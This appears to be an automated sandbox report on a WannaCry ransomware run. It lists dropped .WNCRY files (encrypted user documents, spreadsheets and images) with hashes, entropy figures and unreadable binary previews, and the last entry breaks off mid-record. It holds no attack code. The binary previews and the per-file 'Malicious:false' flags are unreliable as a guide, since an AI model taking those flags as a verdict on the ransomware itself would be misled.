                                                  SHA-512:F88E665DEAB899B348E3F4699623F44F9FC0D47DE2E8339C4FC2FF539BD0E9FA1E4FDC3E90CA30F8C4B3457457F7C02F1204AA93244208F3B009F4AE8EDF6910
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....^..(...C@.Q.C.j.-kh..T..U.Z...v3.%si!..s...X...}I..<U..C.c...(.........Mw.B.......x).9j...YU.l}gKea.G..m....(I...B?X....pm..e....eK{..%M.n...4`!..(....]..k.(2h....2.....(id7... !vV.......Y9..U)..Ag....G.....#..e....Y...)..r,......c&74.!.(.....jt............9S.U.....ews.U.;.....{[..d.V..S..RS.@.V....me....(....t.|.R.m.k........6. 8[\........)lH.)..6!k.]..,.GI......5....L.[....BB.o.0-N..T.+.B.m.........#..>/.'.9..P.4..H=...?.8gt.$..N....-......!19n>Su..]}K6...F..-;!=......4,.e......s..K..7...........B[..U+,..L..w.6.G...-l.k....P.5...6D.,.o#.?.w..Vl..M.../hX2....rN+....-..<an._.$.."..@....zUmD=.tp..d.._$i...~...:-..L....=...J....O......X..?..o.h..9...z.B.....&.......A8bX-UW*u..U.c!....W.@>........Xf..S/..r...%..h...N.....E..7:m...?`(.gl.zY.JY......Q*...N.M^...Rmp.8.nw9..7...I..)-.........[XPq...Q.N.kk.f...^.s....$Ag..."..(..(.....34..)..E....<A..C..a......D.X...C[Z..0.'.Y.h+..s....W....d...R[._H..3.+.'~....a0.9.x@..?.Fc..=Z...

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\GAOBCVIQIJ.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.83031464283867
                                                  Encrypted:false
                                                  SSDEEP:24:bkS3Ir8eZZihIE4+Us4E0qCz4nzHxtW0XJZ6YMzH4MVyDA34LWhJm4l+7sUMkbCN:bkqPPA4nzHx/D6hzH4O25LAJvl+7sUMx
                                                  MD5:EE06AD80636DC54FA88F36B008391FEA
                                                  SHA1:5AF4D0862BD485C720B9B33B0F71E9E9D98858F3
                                                  SHA-256:BCC0476D3FC829A308BD148E1E752CEEA33A9F63D1FCA16FF4ECBFB3C41B783D
                                                  SHA-512:6913FCBCD8B10A4FA213B1342542B37BF46280DBDA7E9611D20410173B076D88F703A5D14A20D7662628D3C722F44A378923F12C7364CBC241533D473E787971
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....X..VyEp.>...S.s.?..zn.If.S........K.F.:swC{.q..N..g t[.1G.[.DYa(..Ti..%&i(......N...U!.Z..1s..v..._....6.q..x...;...V.'[.L..+a....;.%EF.;Y<...R".....6..V...!0..:.....0...w...'....g......>.G.*.G...Q..].....&..x>"-....f1.... .g....)%....5.87...............#4@....b;...I..r..K)...\.V.&".R...)....j.*..R^P......=..*.)..(.TG.<[.cDF.G@.u.~)gdB"c._$V..._Il........2.}./)..;!x~]....<I/.\...L.......Qp...n..a5B.6.7R.A}SI!._.[.u.. :.z?..E....X....N"...EsfJ.=..u..`.r5C&...RZ.Y.S.4.w.^..0..!]........T.X...obzSOp.s....A.M{......b.............-....2m.,.....L9....2.2...k........C..7f......%.j.Fr....[..,.....'.~...-...+.W.~g.s..\..h...nh7....v..v.sRt...S~..|. 0....(..&|9..T.ff..o......K.....Y.a+..\).].).|..B..a..l.{@.#.@..%#..U...t..:.../&.....rp.Z..O..i.+..#.....xMM..zY.. ....#jCR...R6I.w.Xf..._.M...,.fQ.t......]./.pl........v.}..g_.]..-FZ1.|R.....S..6...eI]b.</+f]Zb......hvAU.A.7...{...;l.;@\."....bTFP6..\..]{........;.....!1r.|...A.*.

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\GAOBCVIQIJ.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.848796345452971
                                                  Encrypted:false
                                                  SSDEEP:24:bkGNZsTY6/8HQDoi/gVzpfy6jar9PyvCRYwfpGkKCPjSbtl6oaU5B9F12EGUriT:bkGfsf82gVzNYPyqJfoaPsaYOnP
                                                  MD5:C60E19F38602554FB58E3A0F7F737DFD
                                                  SHA1:ACB275B4EAAA2DBDF74D9AEFE4DDE63EE9D9FDBF
                                                  SHA-256:1917306234433A3C80750C54B4305D3E17209F8FD53681CF24915B19DE515BFB
                                                  SHA-512:628938EE661A72915EC49B382DF85F734BE5B707CA79B6D83795B1B5F6711242ACD0B9A6C332A1CCBF6C577D86E29FF51F2D40A4AADC8DBE2D9311BBE20D409C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........m%.^..........k4..QU...3..l.7Z..O....^AO..e...@#..^6....VI...-.+.y.B......".Wk....4...;wd.....c.......x ..(.T.....F..t"jS....e!...k{......j.+rG..X...U.4...]...*5.....2.}......^_Z.......}..=a..n...<.^rg.[..6B.ZU4o......cd.@2........P..:.;.s............^/3..-T.(+.>...q........co...[.~...6....-.'..m.}.*.$..?6#$..xc.....O._8...`.. 3........b...3..[..l...RB..K6.$...k....>..h]-.9.C..$.....s..I.......\.-..A.3.E....'.9.....'.g..B.....R.e.......{0..,H~@s.*..__c.o..$S....6....FM.`...v$....p.6..UA.+....h.j.....(.ZY.t.P>P.W!...nr..y...LeX...d...vZ..v...#.q.I.6$Z@...tH..#h......}A....v......_...W:.g.#U.w@bkc.C...D.F.....SA.{c..<.l.7.l..!..%*...\..)-oB..n..{y..NI.(Gr1.............Ay.).}.kG6.jWlBV}.n-r..2w.U$....1..bs.6W......K_C..Y}..2..lAr.;._)..(...K9....o.x#F..E.S....nG..w.. 3...Z.g./..u=..........$].#F....n:w...........nV'.QAj....jl.gT.W...._.#...Z.}..9../..0..kh.E..kbA^4.nY.t&.!{..I..^....<G...1>......$....w.bi....x.-.g..{S.T'.4...

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\LSBIHQFDVT.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.872777853650534
                                                  Encrypted:false
                                                  SSDEEP:24:bk++Cr/L0XbZiKRRG6cux5/SNJUQZ+K5jkgTeOvuSzKvpF2vypJ934Pthwv:bkE/YXbbHGjY2SK5ogTYDj2eJ934Fmv
                                                  MD5:7152C96B696C458BB8CC07C4C139DA7E
                                                  SHA1:B9C9B1B3DA050259CB03670D4DC414C4FE881AC6
                                                  SHA-256:B03574312B8506121FB559636B5EFE09A9B64B08E570D236A16E4EE6422E84F8
                                                  SHA-512:D1E7A8994FB84B84E259BC98C465CC19B565364D958CB5DCA209B0A1EA6C98D5231E447FDBC8ADA9C4F7243D3E005D4492501CA4F0C2BC39E26C3B2ADA5DA555
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....tv.6.~..M...vJ.7(J^B.}..B..?.#..w.=...h<....;...k..G.&Z.u...gQa.q1.G....(A.....~...i.s=.V...TzQ,l.8U.b`....O..P..l.:....2..Jr.-....Q...g...).4>.u.=q.eo.....N.b.l....5^=........q...3.s._...6..9..^_.y...Q]....cN...1..bV.+...f....M..*.'..;..<.D............@g.....(E.,'..\..9.p.....Y..1|?...b........i:....sx..g@3.uh...........|j....,y~r`......6. X.nZj.E...]rW.Q......Z.`.<.<.*df..."yZF. ....b.....s&Y#...P<...g.._.UY....5I........;2...8*.E.x..\((.KOR+z.1R..%Vy,.`X..8!.h.....5....X..e...{m.O...L.........'A>.......g..sWa..O.sA......r.7M....z......>p.*.6W.{.m#t.#..kC..#..>.q_.m,.q`....NF.t.t....W@IW.........AJZ..9.-...u[_...V..Q.'.qQ.[.&..g[R.fu...[^@e.....r.-oG..5...K_ <Fu..@!.,...9.#..T...k.H."..}..a...t3.T.G..M.@..-.&@..w...V..>.c.H..+.:...H..4..7....*....@..3.CF.F.Fh+4r[.....qm..y.*U0..#.LCX.x.2...V.>.z..0....#.W.2...9+..Z.L..<|....o.N....h.k.|Q..=]C..1..{..\....B.`...S$..6.Z*{$x..........d..4....QS..a...3I.?.Kc&..Z.]$0e.C..

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\NVWZAPQSQL.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.845346345377583
                                                  Encrypted:false
                                                  SSDEEP:24:bk9bnzjfYHiuheh6SQDTu14ea39vbZk9Y5dhs46MkasJzghCDkNQL6qgqJMT6pPI:bkx8iCehaP3eWvV0YVs592iRLBzJM91h
                                                  MD5:8A2B2DF71862270A3DDA218F861309C0
                                                  SHA1:D92E7416D8B15512D0D2EE06A53F70E547C579FE
                                                  SHA-256:9F0694B5BABBBBB0BB1DE10C633540B6FFC36950D8BDF46D6BC062534D7498BB
                                                  SHA-512:0DD4F52924EF57D7F09CAF325F507CFDCCCE55CAA70062E6762A0FC5AC427B2B513328F1B7D2412E23D9AA671A13B8E1EDD32A1E86F5945A9BACFEFACF69C5AB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....U.2.h8.B.7.Q......nYk0.....!{."r..HT...6T..`.h..v@.*...[.$n......~..+....A../......3.C...W..Db.K/9.J.........l...^T~.RC#Jx.....3.9f...].y5..Fw.....|+./$+......-...a........2o.c.p..;...."...o..........h..|E.J...j. |....0(..........5P..gAAt...............Z,...L......t.r..?.....a.84...T.*.w?.Q.......(8..,..7.c...,f.1}.X..*....h....B.-...*..T<..z.......6e..g..t...e......0...h..B>...,.W!..r+..".....6@...{+....?p...'.-(.P.....A....I}..........6T......(.?....Kz.....@W$..M......L...).0.g.Xb.T...W[.#'r..I....aF..Kf........>...z.4F....V..,r..3m.-1.V[.....X...J|.(......I...... ...+.).]>.n,..2......I.Y..V....X..r..y.).(..N"k...P......7.o"..x..^-.=.=+R.(..'...7..+w\.*nR.qK.R....km...2....Q(0.y_,.N.UvS..GH.*o.....P..|.......Ag)G.W$1........{s8.9.N..!..!.....aG....(=..g\.k).U.j.D2...$..m)..3......r.b&.\..'T..$m.._go..vt...9..,..@...K..xW=.<......R.|..i?..5/...Q.HK.(......UG..S...Ar9C.7...n&...k..E..`F.Q...ioh.J...[.......jP.@?.....r.-3`.

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\NYMMPCEIMA.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.823861494408535
                                                  Encrypted:false
                                                  SSDEEP:24:bkY84SY4oOchCC2Kq4U3fq1ithBP+UAYCQn1fHfVkSXIlAbA8+qv9KJ7SJix:bkNY4Dch9mByGTP+UA5QfkSqA5z9KJ+w
                                                  MD5:26F1655C95582D20A29121A663F9DB58
                                                  SHA1:797EAD6DAC74C60A8BD204ACD6D537389D932E5B
                                                  SHA-256:2F30EAFC4B411F3939DD860A126C140ABB27568A7B24BB8EA20441404D52D742
                                                  SHA-512:05E9199D2A0FC7187A046CA6A0DABAFD2C8F91FEAEEA0D54E96BD2DA7592C4D70D0D71CF8E0122A5D586D88A36213FB84E14122715F3C592E9C6C20FD9AA509B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....K..;....m..n.WQ.b...X....k~..g....9..B..G..O....k..X..7.:~..*..!4.oh.?.O.xAm..^z...r...QVTQ~./.0....s8....:...h..f.0...s.H}.h..s..O..x^..X.G6X.w.....N...=..r.5...................9..r..".`.{..&Q....og...Yw.......K...R9...../...EF..(...X.\.a.............U%L..Vk;N6.......B.'.Z.DDM~4..L...{C....F.A.:[......w.........Y<o<..........,^.. I9..#...X..h.s.......q.%.z.<...L..,..".).....Q..hk1....F;...lu.........:.VH..gu....xb...4..X....3...'....e..P.<.....4t.../.."...+.........o(....I..0.:I..\\.W..T....W...T../.,.t<.r6.zYI!<.j_...^p..d.?#.;t)s+..(.I..B.uOc...!|].. ..p...S....y....7..g.. ..C...U W..aOB..*..H..U'T....k.u..t_...f.`?&.W_..8.@&.3h...].^@{.r.......Ek..`.....G0...L8...~.......3...%m..;.c_...(..s...^L..Q....DO.Nh.*GJ..u.z...:e'....H..[.6.G.....`..h.9P>.n.....*.1......Hk.a.........p.U..\6....)'D..&1?'7.\.:..C3.......$.B..Y..0...q...........3.?..@..R....9/.0[...Ry=.r..=EQ(t#*n.KO.....cV..wm..Qy...Z.|.dU..........te..D.WW.6dr.c.K

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\NYMMPCEIMA.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.854876666404128
                                                  Encrypted:false
                                                  SSDEEP:24:bkym+lkJ9UrwHM0YW99j2XPEmDDb7195S1su6N0haX2obkIiMlMUR:bkz+yzEaM2DasaD/PgCu1hq4RuXR
                                                  MD5:8DA76DECA4032F605A39501B56A97777
                                                  SHA1:4E4461AE4BE7DFF6DA9FB719A97DA45712EF31B1
                                                  SHA-256:8275DCA0C2128624FB855C528B4BF70783EE82BBE1F85001316DD4B5569538D2
                                                  SHA-512:67BBB62E522583A5F6B0DF708359FA27CBBA8608F98E85E7EA7BECB640CC0F10A22E050EC3C58A4208C8E8AE90C0F5303D1BF3FDB9B8EB5970F5828573E44AAF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....5...8.Z../@..c.,RrZ...`.L../)....of$...p...j.])e....>....."}l..8.........g......l.y.{r.yf..@].y.r.r..N...sD.[|..........y..F..^...H.@.Qw.y.X+KD9..M..y.eY.d~2........8....^..\.^[..."..iY!.............E...?..x..x..^SY.x....Uk...........Lr<E.................h.....5.....-Fg.. mB....7e0/m?.]..4../.ITF..@wu..k.....m5?.D.L.%..yV77+.D.T....!J$J..........X.w..H..0...-..o1...<4..hEO:.].u...?.'B.......0..U.....X.(d..D2.Pm..Z......n....kUBKeB.7.4xg....um.,.W.$..i.Hg..P....<h5.D.@..........1.). ..( ..j2.'Y@S...r..0.Sm.p.YpL...-....../...I.....sg.....I.....c.T;o.o....._...a..N......#..5...,.\..[..=c.T.*o-.. ..s..;....J...+.#z.Jc...`..0..k.........9.jJ.._o..?...7."5.@... ..\.$D...A.N....7..`.0m....E.!P!o(Z.q(.....+.R.B:9.H...2.:...".X~W$0x[c~.%Q.b.F]./.mH..q..nR...'$~.....i.....`...1..+....tcOSq...W..J.{..VBf.>...).&3...u.}.E;.^x6-..}X=....z{fA.VC..=...o..J.L{...uc.@H..B.#...fU...m.f.u@67n.r..1......Y]~.Qk..M..vJ.-....n.......a.+#.R.?..Ej

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.831882631044693
                                                  Encrypted:false
                                                  SSDEEP:24:bkY5XxgiD6Ncz+RzkOwTmYES/f8qsjWS3+/JhTote/HhRx64ES3wc+:bkBgIczAkOwynYfnslVte/hRx6ZSQ
                                                  MD5:26D459BA1EE3B9220F4D9632C21793FE
                                                  SHA1:E0465BB3BD6C673E572B8F5C7F1D928B118683DD
                                                  SHA-256:A478958C566E764EFBE6501481A4E82CBAA339F2780312A1F42E5DE747704319
                                                  SHA-512:7E688294CE6E829CBBC7F28DC14FEB56675417C62F7820779F09909FBECD3F919339408DE26B61E8F17489AE659DFE8C13294EF6C40438DD2B3ADC4ECE293B8C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....<.vv.L.....OF..F........JA.ez....y...."...%.E..:.3EzdhY.m.q.....d?..x.S...........}....(..6J.<S..UT.j.\........[-M....5.F.|h...d.>..Y.w.......g.$)`.^S2.q>...2s.P.u.....0.vF...j.Y...h.....'>..-..._.m.)...V.......t.5.QEN..uW.oy...%!...>..,b.............Lj.....q.fx/....uN.V.v.hO@.......iQ.&...uO..o.._.{..+#.g..N.y...R.`.>B}..-..0e..2.....+]......EMV...j4.. ..qk]....}.U]..aO.^...bA?..'...l}..>e._m.w.........-xAN.*.a..."!cY.K...I....(.y...TC...1.m.-..*.k.*.K..6I.....?....`........j.|I.aw..ab.oD.f.#...X2Q...k;b......Q3g..v.X....J...J...h)Z).Qld9....9`u....>..,'._.\|....U/7........0u..7..+......{........h..nz....[Z.. .,X...8.....~L.`.0...h.`/..J....z..l....j.\#$..;....T.qY.Y.D.'h:.%........'...S.:f....Izm.eS.Tn..ow.b..x...}_.=..*...6d....%.Fr.9....TJ8..(cM..g......9.OQ.......r.O=...e..!).....m.... ..].DF..'....1....g....#..s.Kf.%.YXG7{..V..uQ.h..%./.j`..4....>.A.9.I..\cnK.T.q.4...,.#...;5=.s^....(.BI..j....b.u&_..r..[..

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\PWCCAWLGRE.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.861835322984556
                                                  Encrypted:false
                                                  SSDEEP:24:bkEsKPlDjhCP5sImASdZ+JnptlYwCO24ITUM9/IRF4gI4xJ0ICpxdQYanyvZWaw6:bkEXtnPImAgYbtl2L4IoM9/KF4gI4xJi
                                                  MD5:D7E8D50021019949C55044C0E0E0C8BF
                                                  SHA1:8FD4CF8C1107039791B825BF434B0610A2282B69
                                                  SHA-256:FA14F8519FC7FBE1C5D574DE356D9119F082781143CBF9CA3E9D3FE8A3FD6175
                                                  SHA-512:A730EEBC06CDE8E443DED0562754C6C183A7E4DD2998FB2D30DC0A00C36521AC2D28E6E33CEC995AD0EFF72E3EDB5A735ED178165E4DC2452D4B1B4C11B8C844
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....S.1n..i...O.........q....#....(d:....]n>w. %....r....Y.`G?....\....!.$.Q4.=gS.......G../....x^3.N...,.>ar#F.....ts..y..$.mZo...".<.......TB..l6.ZW@......p.....p.\..i...n.@fZ_.||:o>'..D*.B/......6|W ..v.d.<P..G.......q......<..[.?..`....C....3............(.C...G....&.../....e..].$..0.Ap..b....!...Zz...3..v.....R|.N...R.s^.....m....:....C..V.UJ`k.O..X.t5........u...0.0.....w.;...F#Ab.......K.e....lxk&z..m.....{.%.9@...._.3..../b...w$Z..L2.......m.t$...H..s..?Q.-Lc.r....{..1.../+N.;...%M!..QZ.*=..`.....L......M.(,..%.....u..A...Nx..\.~s....~.E...:d ....3..j>fO.....S!Q-..U&....e.~z.[5.p....N..Mc7.h..%..J..G..(....B.c.G.hI .Y..h..n..5..:`...K.7.$....O5kd.f.'.t.[.H.ul...Wv^......c.}...wTTcbC,}......P....x./...0......b..A6;.....p....(....V{S.|...r.O...5{.6u..%X{..G.9..9../Q......d.Raj..M'.k.g..../......;.....~...:="...!;y..sb._..O.W>J,........}BI.r.....s,(./....K?!.X"6..'?.x....>....e.":..<.i..$=..K..t.....t...=.W...ZR

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\PWCCAWLGRE.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.839722427521709
                                                  Encrypted:false
                                                  SSDEEP:24:bkjzvoE+Bfk3j3hJ1Ak2z+kUZvl0LVe6+w/ft6iNso5zNas:bkjzJ+lsj3hJik2rUZvlMVeO9bso5gs
                                                  MD5:34606F3A41D318DDACF5FAA774E2751F
                                                  SHA1:07E216DCF0829C46B774000D18DB5404CAD51DCF
                                                  SHA-256:AC8CECD1448AC554304A566AFEE89DAF5A2B5EF0A8123F1776A349C54F7B0CD0
                                                  SHA-512:D580836BD02C8E11BFA05720169D64B7EDD6CD2C998612D503BB59C6BB59F42CEC4B49086351949F2774CA64E6E21A4FEA6377A190CEFA3BF925EB41265EBC3E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....B....cA./k`.i._...C.e..V2.....E.....j.d.W..]YY....`9#..3}O......^.Y0.(Lz.W. .t,)C.]............%..VZm_t3.....e.%.+......\.K5.......=.$....B.E.9.....!..k0.l:....]...... ~;...m=5x.tA.K..s.dS....b).. ;...}...f...nI..........>aX.v...I.5.a.V...K.............j.C......y........3..H...W...>.U...Mc...g..7....@9!..&..a.).uh.4h...%<.{>y......<1TM...B.M`T..8Z.$...B{..n..a....1.P.....$8../).j..L....tJ.;R.{.#.|.j&~.Mm..#_...v....gGh........e_i"...Y.m...i.?.X...]..L......v.(Z.......Ck.}.......k.@.......9..8.|.E.r......<d..#....n....d...W.Sj.+...I...|gf.e..%E..c........T..<0.+ijm$3b........e..S..w.i....u.g..U|R.. .}...B(Q..7...F.qz..........r...m7.:..,.j7.C.[RK.Bi..K....N"h...qX.l..{..%....$.$.k...an.......5-bnI..E.........acq<b..p.q...D.3U+.....sms....l.}K ."-Cmw>.s13.G./I..B].`.%.....v"aX..z..w\l.y.....Aao.`Ci'..K+.K...}d./.J.\-...j...6.M....~..6Zuk.. .........u_...(s..F.>u{..........]$.lZ.........[..h..&p.V..[..3@....]T.m|.....;H

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\QEURJOJQOH.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85947636127693
                                                  Encrypted:false
                                                  SSDEEP:24:bko4CzWsS2kNgGlvDnOXwj3pcqyWFGdAZN4YE2ZCBk1Wgdnibjq9Gr8o+AYfcKsy:bkqzzpkWGpDtGa74eCBk1WgdAjqov+A0
                                                  MD5:451571151F76AFFC5C001B67FC3C42A3
                                                  SHA1:6E5D489FA2B80DEC5F6424A1A69CC1E76F12AB9D
                                                  SHA-256:440EF8CAEA4A219FFA10FCC4452D05DCDD6D63FBD986755B0D2DA8C2B945647A
                                                  SHA-512:DA1A95633211C55A03152B770DF72A4AE750A4F6A8E08D3B49B6AFC6B1BE9E055FD300568BE776AC68495DF1F3FE0B54149BBBCA870B3DE67C82E21D884A12CC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....Y$.v.o.g..G.#......%A..T.....u.......&..!'......4}...TQ.A.pv3xq....$......U.........=7..a2?.R|.....R...@v..M..7D.ti.H..#..j..6B..#..a...a..].a....?..\.i_.......k.m..8.K........k....(...wO.Gg.j....I4.F...%s.{.'v..D.`.$.'..C.c.>NJ'..%r....r7.~....[>%............_..r.t.6...X..e..#.u./.G.....WDH/.Xy&......, j..C...o.r.S...<,q...R...1D....^..S.DD..A#.P.$.w.x..h..L.....{+..p..pj...g..r^[.>.....Z..]..Cq...n.b.LO[..<..O...y..d0TO......[.\p..*....x..P...$.{A..I~.0o.Q.N.....dr.3..._..Q:...`.R:..7T.....O./3...F{!.>....n..~Tr..H...,U.]..E_c0.......J.;:DV.KR....$0...`...........MZ.m:k..'KX...4....,.~.w..GM.8.....6.B..`..D.Q..k..OYmDW.. ....b/g@.Dk.!.<X"..[...Wf..fo/(.1.2s...8...$....,;..>.......0.1t...Z*=..p'.=..........G.....M.+.,h...&...P.2....o...l.Y.]w.K!...?...w...jS..v.T`...Wc...{.?.F'm;O......I..w....hg...Bk..q.Og.....G.V/.X6...l.h&d..KD*uL.=b..0.;..}'.GC^....Q.|K.. .h_Y.......<..._xV.\.3....".....G.d*.P...zL.QMM.....acb._9...... ..}O...?

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\QNCYCDFIJJ.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.837995244631193
                                                  Encrypted:false
                                                  SSDEEP:24:bkU6p2EzABs0bvv2cUYjIvnyHbe5VtcDAGTmmuzyn0hBIazb+GyIy+z8H:bkU6MEOzgVAyRGT90hBIa/+GVy5H
                                                  MD5:B1C00284657B116708C8CF5E77EDA5AE
                                                  SHA1:33477415B3286F0B2ECDA5F1EA3CB327256D1A17
                                                  SHA-256:4D2CBC0960AA419DF398BB3524C1A77A530EEF75A209720BE73649E9820A1F81
                                                  SHA-512:44FBFB0BEF29E3A9F1A30F6FF0E16325604918AACF2E84FAC1C5EAF655EB7BD776D875E10E17317BD1858A84E441D59144DD7FE379E549651741B42806BFB9A4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......Z...&H...bl.q.a..\S"..1...!.'=@.o..H..<:..C<..,....9`a../.....|wX.'.2L.s".h.A:.Q...5.a ..q.a.hC...s.fV.......)......./^.F..<..p.n.;..;&.e...~.b.....h[..=#.j..!...5I%.cH.....)V.a.P.z.N#.U._.&.....S.......y.7.../ka.K4...D ...e<..w.XJ.....Pc................N.... *......'i.>Y|.l..#...Pd....d.q...4...3YK.......s}.nIp.......<n.s.nD}E.....:$Y.V.VC...B^"..LQ..s.2Jp.Fx..im.[z8.#Ra.>..=.O@[ks.^.r.....I.Y.aRK.)M.......+W+..C.0..b..G...Az....mjK/..VP..<v.z.w.A'n......d.....c...c'%.@.=.SQ'..L.l....a.XH...D..g..7............mZ.,.K....1..i~..9".[........N4.m...|.8<...>..g.b....I.........6..-h./....[k..w...B....Q....?..c 5...e..n../`r-......x....S..K........6J...VS...O)?.a..+.g..)..?......t..XE/...^.|Z.4bp.g.k...cJ4..4EUF>....T....'...^..SW....H.P....\.;..=.i..k......cq]..u.%\.'^......?......}|....g.\=....~6.ON.?..d,+.......&...P.!..@yA....w...CO...Rx.......#...e.nC40.......fuI.E..V.?......P.t.....iq...pp}P.?..s{....`..9B.o.?G.bR.../.P*.&{......%.

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\QNCYCDFIJJ.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85512783623806
                                                  Encrypted:false
                                                  SSDEEP:24:bkNx8Hw0Ir5L4ttY8HWiBgSkTHyY/OWq8iYGSUsg25vJLecT0M8t5m2F7XKZdnCI:bkkQ0iLE1HpBgSahwk5vheY0BPmI7T8
                                                  MD5:3D8086BBD173F8231A745F7C2C9C0C90
                                                  SHA1:E0B6F9FA720C866CCF818EC896DCE57A769262F0
                                                  SHA-256:934BEC187C6CB58A61C044D69CC6D36CA7EAA2905711BCEE0FEE7429309E4DD3
                                                  SHA-512:94C8255AEF4DC9C05169AFC4008AED2A595E000E3AB3BDBD454135B47073401AAD0B373C2DEE87B7C48C13148DD4C262AE720C1FBECBE70DB1546066DDCFBE29
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......@.A1......d..O.j..a._.o..C.....d.8V.BVu_.G...%%..t[.@q...+.|..&..Z......p.......Wh.=.......!Z&3W..F.!...!......6$B......i!.c.?86.h.r....o..x....Z..!..p...]...)...lA.W~.....A^J...IG3....y.+~.....t..)..15..].#T[.,.E..N..........>V....9.Y..4*@..............(....0..*#q...<Y.....K....=...bY...2....2......_..B.... .tAQO..Rhf...J......B.Z%..q.1..98CR.e.[..H.5rvF.h. ....`z&.Ri.T....\9......6.m...e]R<.....c.k.b.yP.N.Z8>8.a..e.o?...6).!..r.,.u.......B}.b.ll.>...%.w.3WcdH5vp..|..aC.Td.+....%...Y."vs.!x'....-O1tF.$2.5iC.iR.a.*...[.~..j.cT`.m..V...U*.....&.7A\[9....BV.GV..k..?.n.p....s...R...3.`..../..&O....'#r.f.........k.."-..b%..5.=.....w...Y_.P..bvf.I2...+Oi.;....,E....d.............s.|.......&.h.2g..f../S.......j.G....u.*-p.......Xz=......oJ...)........w V;Qi.D.#e...H...Gf.7.1...ha....qNFz.}..c.t.)Z...=.8.....yp...w*.g..C.^R.,...q..].......X...;..s=4...&.?...xl...C..n...q.Wp.E..#M.6u.t.].h.Q..9.....F/^.l.bE.....D...J.t.b.-. ....o!~

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\WHZAGPPPLA.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.857915123985954
                                                  Encrypted:false
                                                  SSDEEP:24:bk0JLdTA6pSYQGJZBq/h7211iIc6j/fXRpEWP+GcYQ8QAGLK:bkcLi6QYtVqZSrfXRpGGcYbIO
                                                  MD5:581ABFAC5CA2CC0DA658625701B59AA0
                                                  SHA1:AD1246C831AE20976F1BB3E5FF794B5C5A31D94E
                                                  SHA-256:55CD03B1A4131DD022774DCEF1450F32DAE1AA0E9E6E24330DD1D24DB2F11515
